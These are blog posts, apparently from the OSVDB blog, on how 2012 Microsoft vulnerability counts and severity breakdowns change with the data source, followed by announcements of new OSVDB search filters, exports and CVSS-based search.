A cursory look at the data in OSVDB showed there were closer to 170 vulnerabilities verified by Microsoft in 2012. Doing a search to include references for “MS12” (used in their advisory designation), 160 results. This is how it was easy to determine the number Horan used was inaccurate, or his wording was. If you generate statistics based on advisories versus independent vulnerabilities, results will vary greatly. To add a third perspective, we must also consider the total number of disclosed vulnerabilities in Microsoft products. This means ones that did not correspond to a Microsoft advisory (e.g. perhaps a KB only), did not receive a CVE designation, or were missed completely by the company. On Twitter, Space Rogue (@spacerog) asked about severity breakdowns over the last few years. Since that would take considerable time to generate, I am going to stay focused on 2012 as it demonstrates the issues. Hopefully this will give him a few numbers though!

If we look at the 2012 Microsoft advisories versus 2012 Microsoft CVE versus 2012 Microsoft total vulnerabilities, and do a percentage breakdown by severity, you can see heavy bias. We will use the following breakdown of CVSS scores to determine severity: 9 – 10 = critical, 7 – 8.9 = important, 4 – 6.9 = moderate, 0 – 3.9 = low.

Base SourceCriticalImportantModerateLow
2012 Advisories (83)35 (42.2%)46 (55.4%)2 (2.4%)
2012 CVE (160)100 (62.5%)18 (11.3%)39 (24.4%)3 (1.8%)
2012 Total (176)101 (57.4%)19 (10.8%)41 (23.3%)15 (8.5%)

It isn’t easy to see the big shifts in totals in a chart, but it is important to establish the numbers involved when displaying any type of chart or visual representation. If we look at those three breakdowns using simple pie charts, the shifts become much more apparent:

The visual jump in critical vulnerabilities from the first to the second two charts is distinct. In addition, notice the jump from the first two charts to the third in regards to the low severity vulnerabilities and that they didn’t even make an appearance on the first chart. This is a simple example of how the “same” vulnerabilities can be represented, based on terminology and the source of data. If you want to get pedantic, there are additional considerations that must be factored into these vulnerabilities.

In no particular order, these are other points that should not only be considered, but disclaimed in any presentation of the data above. While it may seem minor, at least one of these points could further skew vulnerability counts and severity distribution.

  • MS12-080 Only contains 1 CVE if you look at immediate identifiers, but also contains 2 more CVE in the fine print related to Oracle Outside In, which is used by the products listed in the advisory.
  • MS12-058 actually has no immediate CVEs! If you read the fine print, it actually covers 13 vulnerabilities. Again, these are vulnerabilities in Oracle Outside In, which is used in some Microsoft products.
  • Of the 176 Microsoft vulnerabilities in 2012, as tracked by OSVDB, 10 do not have CVE identifiers assigned.
  • OSVDB 83750 may or may not be a vulnerability, as it is based on a Microsoft KB with uncertain wording. Vague vulnerability disclosures can skew statistics.
  • Most of these CVSS scores are taken from the National Vulnerability Database (NVD). NVD outsources CVSS score generation to junior analysts from a large consulting firm. Just as we occasionally have mistakes in our CVSS scores, so does NVD. Overall, the number of scores that have serious errors are low, but they can still introduce a level of error into statistics.
  • One of the vulnerabilities (OSVDB 88774 / CVE-2012-4792) has no formal Microsoft advisory, because it is a 0-day that was just discovered two days ago. There will almost certainly be a formal Microsoft advisory in January 2013 that covers it. This highlights a big problem with using vendor advisories for any statistic generation. Vendors generally release advisories when their investigation of the issue has completed, and a formal solution is made available. Generating statistics or graphics off the same vulnerabilities, but using disclosure versus solution date will give two different results.

These are just a few ways that statistics can be manipulated, often by accident, and why presenting as much data and explanation is beneficial to everyone. I certainly hope that SCMagazine and/or CORE will issue a small correction or explanation as to the what the “83” number really represents.

OSVDB – Search Filters & Custom Exports

[This was originally published on the OSVDB blog.]

Last week, OSVDB enhanced the search results capability by adding a considerable amount of filter capability, a simple “results by year” graph and export capability. Rather than draft a huge walkthrough, open a search in a new tab and title search for “microsoft windows”.

As always, the results will display showing the OSVDB ID, disclosure date and OSVDB title. On the left however, are several new options. First, a summary graph will be displayed showing the number of vulnerabilities by year, based on your search results. Next, you can toggle the displayed fields to add CVE, CVSSv2 score and/or the percent complete. The percent complete refers to the status of the OSVDB entry, and how many fields have been completed. Below that are one click filters that let you further refine your search results by the following criteria:

  • Reference Type – only show results that contain a given type of reference
  • Category – show results based on the vulnerability category
  • Disclosure Year – refine results by limiting to a specific year
  • CVSS Score – only show entries that are scored in a given range
  • Percent Complete – filter results based on how complete the OSVDB entry is

Once you have your ideal search results, you can then export them to XML, custom RSS feed or CSV. The export will only work for the first 100 results. If you need a bigger data set to work with, we encourage you to download the database instead.

With the new search capability, you should be able to perform very detailed searches, easily manipulate the results and even import them into another application or presentation. If you have other ideas of how a VDB search can be refined to provide more flexibility and power, contact us!

OSVDB – Search Enhance: by CVSS Score or Attribute

[This was originally published on the OSVDB blog.]

Using the ‘Advanced Search‘, you can now search the database by entering a CVSSv2 score range (e.g., 8 to 10) or by a specific CVSSv2 attribute (e.g., Confidentiality : Partial). To search for entries with only a 10 score, use the search range 10 to 10.

Using this search mechanism, we can see there are 3,217 entries in the database with a score of 10 and 9,266 entries that involve a complete loss of availability.

We hope this flexibility allows for even more refined searches to better help your project or organization. Stay tuned, this is one of many new search features planned.